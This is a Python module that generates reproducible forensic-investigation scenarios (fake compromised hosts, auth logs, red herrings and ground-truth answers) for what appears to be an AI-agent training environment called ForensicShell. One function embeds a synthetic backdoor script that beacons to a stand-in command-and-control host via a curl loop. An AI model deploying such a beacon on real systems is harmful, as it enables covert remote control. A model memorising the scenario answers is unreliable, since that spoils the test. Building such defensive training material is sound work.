""" Procedural scenario generator for ForensicShell. Pure function of (seed, difficulty, pattern). Identical inputs always produce identical scenarios, so seeds work as train/val/test splits and make curricula reproducible. No global random state is touched. Public API: generate_scenario(seed, difficulty=3, pattern=None) -> dict The returned dict has the same shape as the hand-authored SCENARIO_1/2/3 in scenarios.py — it is a drop-in replacement the env can load through reset(). Difficulty tiers: 1 easy user + ip 2 medium + modified_files + backdoor_sha256 3 medium+ same as 2 but more noise 4 hard + timeline, with red-herring content 5 hard+ same as 4 with extra red herrings and more complex timeline """ from __future__ import annotations import hashlib import random from datetime import datetime, timedelta from types import SimpleNamespace from typing import Dict, Optional from .attack_patterns import PATTERNS from .name_pools import ( DECOY_USERS, HOSTNAMES, sample_hostname, sample_internal_ip, sample_public_ip, sample_username, ) # --------------------------------------------------------------------------- # Deterministic seed → backdoor bytes # --------------------------------------------------------------------------- def _synth_backdoor(seed: int, pattern: str) -> tuple[bytes, str, str]: """ Return (bytes, sha256_hex, short_slug). Byte content is deterministic in (seed, pattern) so two generated scenarios with the same seed/pattern have the same SHA256 — matches what the grader will compare against. """ short = hashlib.md5(f"{seed}-{pattern}".encode()).hexdigest()[:6] header = ( f"#!/bin/sh\n" f"# synthetic payload {pattern}\n" f"# seed={seed} slug={short}\n" ).encode() body = ( f"while :; do\n" f" curl -s -X POST http://c2.example/beacon -d \"id={short}\"\n" f" sleep 60\n" f"done\n" ).encode() payload = header + body + hashlib.sha256(f"{seed}|{pattern}".encode()).digest() return payload, hashlib.sha256(payload).hexdigest(), short def _backdoor_path_for(pattern_tag: str, short: str, user: str) -> str: """Where the pattern drops its persistence blob.""" if pattern_tag == "webshell": return f"/var/www/html/.{short}.bin" if pattern_tag == "supply_chain": return f"/tmp/.{short}" if pattern_tag == "insider": return "/tmp/.staging/dump.sql" if pattern_tag == "ssh_key_theft": return f"/usr/local/sbin/.{short}" return f"/usr/local/bin/.{short}" # --------------------------------------------------------------------------- # Filesystem + ground-truth assembly # --------------------------------------------------------------------------- def _legit_noise_auth_log(rng, host: str, ts_base: datetime, lines: int = 8) -> list[str]: """Render benign, plausible auth log entries to pad the log.""" out = [] for i in range(lines): ts = ts_base - timedelta(hours=rng.randint(1, 72), minutes=rng.randint(0, 59)) who = rng.choice(["ops", "alice", "bob", "jenkins", "monitoring", "deploy"]) internal = "10.0.0." + str(rng.randint(2, 200)) kind = rng.choice(["Accepted publickey", "session opened", "Received disconnect"]) if kind == "Accepted publickey": out.append( f"{ts.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: " f"Accepted publickey for {who} from {internal} port {rng.randint(30000, 65000)} ssh2" ) elif kind == "session opened": out.append( f"{ts.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: " f"pam_unix(sshd:session): session opened for user {who} by (uid=0)" ) else: out.append( f"{ts.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: " f"Received disconnect from {internal} port {rng.randint(30000, 65000)}:11: disconnected by user" ) return out def _passwd_file(main_user: str, rng) -> str: users = list(DECOY_USERS) + [main_user] rng.shuffle(users) lines = ["root:x:0:0:root:/root:/bin/bash"] uid = 1000 for u in users: lines.append(f"{u}:x:{uid}:{uid}:{u.title()},,,:/home/{u}:/bin/bash") uid += 1 return "\n".join(lines) + "\n" def _red_herrings(rng, host: str, ts_base: datetime, intensity: int) -> dict: """ Inject decoy content at difficulty >= 4. Returns a dict of extra filesystem entries. None of these should end up in ground_truth.modified_files. intensity: 1 (diff 4) or 2 (diff 5+). """ extras = {} # 1. Decoy auth.log.1 with a failed-login probe from an unrelated IP decoy_ip = sample_public_ip(rng) extras["/var/log/auth.log.1"] = ( f"{(ts_base - timedelta(days=1)).strftime('%b %d %H:%M:%S')} {host} " f"sshd[101]: Failed password for invalid user admin from {decoy_ip} " f"port {rng.randint(30000, 65000)} ssh2\n" f"{(ts_base - timedelta(days=1, minutes=-3)).strftime('%b %d %H:%M:%S')} {host} " f"sshd[104]: Received disconnect from {decoy_ip}: [preauth]\n" ) # 2. A decoy user's bash_history with suspicious-looking-but-benign commands decoy_user = rng.choice(DECOY_USERS) extras[f"/home/{decoy_user}/.bash_history"] = ( "ls -la\n" "sudo systemctl status cron\n" "curl https://api.github.com/users/torvalds\n" "python3 -m http.server 8000 &\n" "pkill -f http.server\n" ) if intensity >= 2: # 3. A /tmp/.cache binary with random bytes — agent might stat/sha it and submit wrongly junk = hashlib.sha256(f"decoy-{rng.random()}".encode()).digest() * 4 extras["/tmp/.cache"] = junk # 4. A decoy cron that looks suspicious but is benign extras["/etc/cron.d/backup-nightly"] = ( "# Nightly backup — owned by ops team\n" "0 4 * * * root /usr/local/sbin/backup.sh >/dev/null 2>&1\n" ) return extras # --------------------------------------------------------------------------- # Main public function # --------------------------------------------------------------------------- def generate_scenario( seed: int, difficulty: int = 3, pattern: Optional[str] = None, ) -> Dict: """ Deterministic scenario generator. Args: seed: any integer — identical inputs yield identical scenarios difficulty: 1..5 (clamped) pattern: one of attack_patterns.PATTERNS keys; if None, picked from seed Returns: dict with keys: task_id, difficulty, description, filesystem, ground_truth """ if difficulty < 1: difficulty = 1 if difficulty > 5: difficulty = 5 rng = random.Random(int(seed)) # 1. pick pattern if pattern is None: pattern = rng.choice(list(PATTERNS.keys())) if pattern not in PATTERNS: raise ValueError(f"unknown pattern: {pattern}") # 2. sample entities host = sample_hostname(rng) main_user = sample_username(rng) if pattern == "insider": attacker_ip = sample_internal_ip(rng) else: attacker_ip = sample_public_ip(rng) # 3. base timestamp — always in 2025, deterministic day_offset = rng.randint(0, 365) hour = rng.randint(8, 22) minute = rng.randint(0, 59) ts_base = datetime(2025, 1, 1) + timedelta(days=day_offset, hours=hour, minutes=minute) # 4. synthesize backdoor payload bd_bytes, bd_sha, short = _synth_backdoor(int(seed), pattern) bd_path = _backdoor_path_for(pattern, short, main_user) ctx = SimpleNamespace( rng=rng, user=main_user, ip=attacker_ip, host=host, ts_base=ts_base, backdoor_bytes=bd_bytes, backdoor_sha256=bd_sha, backdoor_path=bd_path, short=short, ) # 5. run the pattern template pattern_fn = PATTERNS[pattern] result = pattern_fn(ctx) # 6. build filesystem noise = _legit_noise_auth_log(rng, host, ts_base, lines=6) auth_log = "\n".join(noise + result["auth_log_lines"]) + "\n" filesystem: Dict[str, object] = { "/var/log/auth.log": auth_log, f"/home/{main_user}/.bash_history": result["bash_history"], "/etc/passwd": _passwd_file(main_user, rng), "/etc/hostname": f"{host}\n", f"/home/{main_user}/readme.txt": f"{main_user}'s home dir.\n", } # add pattern-specific modified files for path, content in result["modified_files"].items(): filesystem[path] = content # 7. red herrings if difficulty >= 4: intensity = 1 if difficulty == 4 else 2 herrings = _red_herrings(rng, host, ts_base, intensity) for path, content in herrings.items(): if path in filesystem: continue # never overwrite a real artifact filesystem[path] = content # 8. path-collision sanity check (duplicate keys impossible in a dict, but # ensure every ground-truth path actually exists in the filesystem) for p in result["modified_paths"]: assert p in filesystem, f"ground-truth path not in filesystem: {p}" # 9. assemble ground truth by difficulty tier gt: Dict = { "compromised_user": main_user, "initial_ip": attacker_ip, } if difficulty >= 2: gt["modified_files"] = list(result["modified_paths"]) gt["backdoor_sha256"] = bd_sha if difficulty >= 4: gt["timeline"] = list(result["timeline"]) task_id = f"gen_{int(seed)}_d{difficulty}_{pattern}" description = _describe(difficulty, pattern, main_user, host) return { "task_id": task_id, "difficulty": _difficulty_label(difficulty), "description": description, "filesystem": filesystem, "ground_truth": gt, } # --------------------------------------------------------------------------- # Small helpers # --------------------------------------------------------------------------- def _difficulty_label(d: int) -> str: return {1: "easy", 2: "medium", 3: "medium", 4: "hard", 5: "hard"}.get(d, "medium") def _describe(difficulty: int, pattern: str, user: str, host: str) -> str: base = ( f"Host '{host}' was compromised. Investigate the filesystem to determine " f"what happened. Start by reading /var/log/auth.log and the shell histories " f"under /home." ) if difficulty == 1: return ( f"{base} Report: compromised_user and initial_ip only. " f"(Pattern: {pattern})" ) if difficulty in (2, 3): return ( f"{base} Report: compromised_user, initial_ip, modified_files " f"(absolute paths), and the SHA256 of the attacker-dropped backdoor. " f"(Pattern: {pattern})" ) return ( f"{base} Report: compromised_user, initial_ip, modified_files, " f"backdoor_sha256, AND an ordered kill-chain timeline with phases " f"login -> recon -> privesc -> persistence -> exfil. Red herrings may be " f"present. (Pattern: {pattern})" )